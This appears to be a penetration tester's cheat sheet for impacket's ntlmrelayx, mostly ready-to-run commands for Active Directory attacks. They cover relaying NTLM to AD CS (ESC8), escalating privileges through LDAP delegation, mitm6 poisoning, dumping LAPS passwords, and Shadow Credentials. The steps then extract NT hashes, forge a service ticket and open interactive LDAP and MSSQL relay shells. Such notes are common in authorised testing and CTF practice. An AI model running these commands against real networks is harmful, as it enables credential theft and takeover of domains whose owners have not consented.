#
ntlmrelayx.py
ntlmrelay is part of impacket.
#
Install
I usually use the embedded version in exegol, but that doesn't always play nice, so I like to go:
python3 -m venv venv
source venv/bin/activate
python3 -m pipx install impacket
Then just run things directly, like:
ntlmrelayx
#
Logging output
ntlmrelayx YOUR-COMMANDS --output-file output.log
#
Add date/timestamp to logs
Add -ts
somewhere in the command:
-ts
#
Relaying with ADCS ESC8 attack
ntlmrelayx -t http://ca.domain.com/certsrv/certfnsh.asp -smb2support --adcs -debug --template 'DomainController'
#
Escalate privileges via relay
If you've already added a computer record to the environment (using something like powermad), you may be able relay to LDAP and assign escalated privileges to that computer object! For example:
ntlmrelayx.py -t ldap://ip.of.domain.controller --delegate-access -smb2support --escalate-user COMPUTER-OBJECT-YOU-CONTROL$
Then, if you've found a system running WebClient, you could potentially coerce authentication to a DNS record you've added and pull off the privesc!
#
Delegate access attack while poisoning with mitm6
ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.a.domain-controller --delegate-access
#
Setup SOCKS relay to a list of hosts
In this example we have a targets.txt
file full of entries like this:
smb://1.2.3.4
smb://1.2.3.5
smb://1.2.3.6
We setup the SOCKS relay like so:
ntlmrelayx.py -tf targets.txt -smb2support -socks
#
Dumping LAPS passwords
If you want to just setup a relay to dump the LAPS passwords (if you're lucky enough to relay a DA cred), you can skip the dumping of domain info and/or adding a DA account and just specify you want to dump LAPS passwords:
ntlmrelayx.py -6 -wh doesntexist -t ldap://ip.of.a.domain-controller --no-da --no-dump --dump-laps
#
Shadow Credentials attack
My favorite write-up on this attack is probably this one from GuidePoint security.
#
Find hosts with WebClient running
The webclientservicescanner works well for this.
#
Add a rogue DNS record pointing to your machine
Try dnstool.py for this.
#
Setup relay for the Shadow Credentials attack
ntlmrelayx.py -t ldap://ip.of.a.dc --shadow-credentials --shadow-target 'VICTIM$' --no-validate-privs --no-dump --no-da
#
Trigger HTTP auth from VICTIMS
Head to our coercer page for more info.
#
Use the PFX to get a TGT
gettgtpkinit.py -cert-pfx cert.pfx -pfx-pass WHATEVER-PASS-IS domain.com/VICTIM$ cert.ccache
export KRB5CCNAME=cert.ccache
This will spit out a bunch of information including the encryption key, which you can then use to extract the NT hash of the machine:
getnthash.py -dc-ip IP.OF.A.DC -key XXXENCRYPTION KEY GOES HEREXXX
With the NT hash, you can forge a sliver ticket. First get the SID of the domain. Below is a way to get that by querying the Administrator account which will give you the domain. Just be sure in the ticketer.py
command that follows that you remove the RID (last part of the SID):
pywerview.py get-adobject -d domain.com -u lowpriv -p 'password' -t IP.OF.A.DOMAINCONTROLLER --sam-account-name administrator --attributes objectsid
Forge the ticket!
ticketer.py -domain domain.com -domain-sid xxxBE SURE TO LEAVE OFF THE RID!!!xxx -nthash yyy -spn cifs/VICTIMSYSTEM.domain.com administrator
#
Shadow Credentials attack (with LDAP shell)
I followed these instructions to pwn a HBT: Mist machine for this.
#
Get a venv setup
python3 -m venv venv
source venv/bin/activate
#
Install the appropriate impacket fork
git clone -b interactive-ldap-shadow-creds https://github.com/Tw1sm/impacket.git
cd impacket
pip install --upgrade pip
pip install .
pip install setuptools
#
Run ntlmrelayx with sudo permissions:
sudo ~/venv/bin/python3 impacket/examples/ntlmrelayx.py -smb2support -t ldap://ip.of.a.dc -i
#
Interact with the relay
nc 127.0.0.1 11000
#
Relay to MSSQL with interactive shell
ntlmrelayx -t mssql://192.168.7.7 -i -ts -smb2support